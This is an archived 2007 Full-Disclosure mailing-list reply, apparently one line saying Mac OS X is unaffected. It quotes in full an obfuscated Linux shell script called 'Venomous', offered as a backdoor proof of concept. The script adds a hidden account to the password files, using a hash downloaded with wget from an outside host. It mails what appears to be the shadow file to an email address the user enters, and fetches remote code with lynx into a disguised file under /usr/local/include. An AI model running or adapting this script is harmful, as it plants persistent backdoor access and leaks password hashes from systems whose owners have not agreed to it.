lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 14 May 2007 08:47:39 +0800
From: "Just1n T1mberlake" <hotpackets@...lokitty.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux big bang theory....

Confirmed Macosx is not vulnerable to this.

just1n

--
NeXT is one of my best friends, Love & Sincerity

Mac OS X Evangelist
Public Relations of NeXus


> ----- Original Message -----
> From: "J. Oquendo" <sil@...iltrated.net>
> To: "full-disclosure" <full-disclosure@...ts.grok.org.uk>
> Subject: [Full-disclosure] Linux big bang theory....
> Date: Wed, 09 May 2007 17:42:52 -0400
> 
> 
> Enjoy||Complain
> 
> # !/bin/sh
> # Venomous
> # Linux PoC backdoor keeper...
> # http://www.infiltrated.net/ubuntuDestruction.php
> # J. Oquendo (c) 05/09/2007 # If you have to ask you shouldn't run 
> this password for venomous
> # is password
> 
> 
> happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
> days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
> guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
> sed -n '1p' $happy|awk -F ":" 
> 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
> sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F 
> ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
> what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
> who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, 
> ""){print $4" -a"}'`
> echo "Enter your email address" ; read ans ; where=$ans
> $who | $what $where
> 
> 
> # Ugly method too keep a rootaccount Follows... For those not in the know...
> # Venomous was an idea made to prove a point, not give script kiddiots another
> # tool to be morons with. Instead of ruining things, how about solving...
> # Instead of naysaying... Prove me wrong
> 
> 
> # Pick a ranDumb file in /usr/includes/ then create the samevbackdoor on the
> # system using this filename. Do something sneaky on your own to place this
> # file on a startup I could show you, but then I would have to kill -9 you
> 
> # Note the location... Highly doubtable to remove an actual include file
> # unless some stupid admin did something really dumb... Before someone mouths
> # around via e-mail... I could have written this all inclusively but I chose
> # not to for obvious reasons...
> 
> random=`date|awk -F : '{print $3}'|awk '{print $1}'`
> echo $random > /tmp/secCommand
> sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' 
> /tmp/secCommand|sed -n '1p'`
> rm /tmp/secCommand
> filename=`echo $sad|sh|awk -F . '{print $1}'`
> 
> lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n 
> '226,233p' >> /usr/local/include/$filename.h
> 
> # Now of course I could have modified this to replicate any one of the files
> # on startup but again... PoC ... The naysayers will ramble on about "You're
> # out of your mind..." Am I? I've given you the PoC's what more do you want...
> # Ubuntu or any Linux for the lowly home user is a horrible idea...
> 
> # And AGAIN before someone fires off "I would see the URL and that's a dead
> # giveaway!" ... Look, I'm trying to make a point here... I "could 
> have" # a functioning backdoor undetectable to most integrity 
> checkers, Samhain,
> # Tripwire etc., but why should I disclose this anywhere. It's not in the
> # best interest of anyone to do so... Don't bother asking for it via email
> # because it's not public and will never be...
> 
> # This again... Was to prove a point to the naysayers who this shit doesn't
> # happen... Keep dreaming. Its only a matter of time before you guys go
> # Goo Goo about getting Linux for Idjits off the ground, but its a horrible
> # mistake in the making
> 
> 
> -- ====================================================
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> echo infiltrated.net|sed 's/^/sil@/g' "Wise men talk because they 
> have something to say;
> fools, because they have to say something." -- Plato
> << smime.p7s >>
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

>


-- 
_______________________________________________
Get a free @hellokitty.com, @mymelody.com, or @kuririnmail.com email account
today at www.sanriotown.com, and enjoy 500MB of storage!
Check out our official blog @ http://blog.hellokitty.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ